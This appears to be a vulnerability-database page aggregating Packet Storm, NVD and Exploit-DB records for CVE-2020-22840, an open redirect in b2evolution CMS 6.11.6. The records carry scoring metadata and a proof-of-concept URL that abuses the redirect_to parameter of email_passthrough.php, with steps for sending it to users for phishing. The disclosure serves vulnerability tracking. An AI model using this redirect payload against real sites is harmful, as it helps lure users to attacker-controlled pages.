b2evolution CMS 6.11.6 Open Redirection

2021-02-10T00:00:00

Description

{"id": "PACKETSTORM:161362", "type": "packetstorm", "bulletinFamily": "exploit", "title": "b2evolution CMS 6.11.6 Open Redirection", "description": "", "published": "2021-02-10T00:00:00", "modified": "2021-02-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html", "reporter": "Nakul Ratti", "references": [], "cvelist": ["CVE-2020-22840"], "lastseen": "2021-02-10T15:42:20", "viewCount": 273, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-22840"]}, {"type": "exploitdb", "idList": ["EDB-ID:49554"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-22840"]}, {"type": "exploitdb", "idList": ["EDB-ID:49554"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceHref": "https://packetstormsecurity.com/files/download/161362/b2evolutioncms6116-redirect.txt", "sourceData": "`# Exploit Title: *Open redirect in b2evolution CMS 6.11.6 redirect_to \nparameter in email_passthrough.php* \n# Google Dork: N/A \n# Date: 10/02/2021 \n# Exploit Author: Soham Bakore, Nakul Ratti \n# Vendor Homepage: https://b2evolution.net/ \n# Software Link: \nhttps://b2evolution.net/downloads/6-11-6-stable?download=12405 \n# Version: 6.11.6 \n# Tested on: latest version of Chrome, Firefox on Windows and Linux \n# CVE : *CVE-2020-22840* \n \nVulnerable File: \n-------------------------- \nhttp://host/htsrv/email_passthrough.php <http://host/evoadm.php> \n \nVulnerable Issue: \n-------------------------- \nredirect_to parameter has no input validation/domain whitelisting. \n \n--------------------------Proof of Concept----------------------- \nSteps to Reproduce: \n \n1. Send the following link : \n*http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com \n<http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com>* \nto \nthe unsuspecting user \n2. The user will be redirected to Google.com or any other attacker \ncontrolled domain \n3. This can be used to perform malicious phishing campaigns on unsuspecting \nusers \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645917513}}

{"cve": [{"lastseen": "2022-03-23T15:13:22", "description": "Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-02-09T14:15:00", "type": "cve", "title": "CVE-2020-22840", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-22840"], "modified": "2021-02-17T20:24:00", "cpe": [], "id": "CVE-2020-22840", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-22840", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": []}], "exploitdb": [{"lastseen": "2022-05-13T17:39:53", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-02-11T00:00:00", "type": "exploitdb", "title": "b2evolution 6.11.6 - 'redirect_to' Open Redirect", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-22840"], "modified": "2021-02-11T00:00:00", "id": "EDB-ID:49554", "href": "https://www.exploit-db.com/exploits/49554", "sourceData": "# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect\r\n# Date: 10/02/2021\r\n# Exploit Author: Soham Bakore, Nakul Ratti\r\n# Vendor Homepage: https://b2evolution.net/\r\n# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405\r\n# Version: 6.11.6\r\n# Tested on: latest version of Chrome, Firefox on Windows and Linux\r\n# CVE : CVE-2020-22840\r\n\r\n\r\n--------------------------Proof of Concept-----------------------\r\n\r\n\r\n1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user\r\n2. The user will be redirected to Google.com or any other attacker controlled domain\r\n3. This can be used to perform malicious phishing campaigns on unsuspecting users", "sourceHref": "https://www.exploit-db.com/download/49554", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}]}

b2evolution CMS 6.11.6 Open Redirection

Description

Related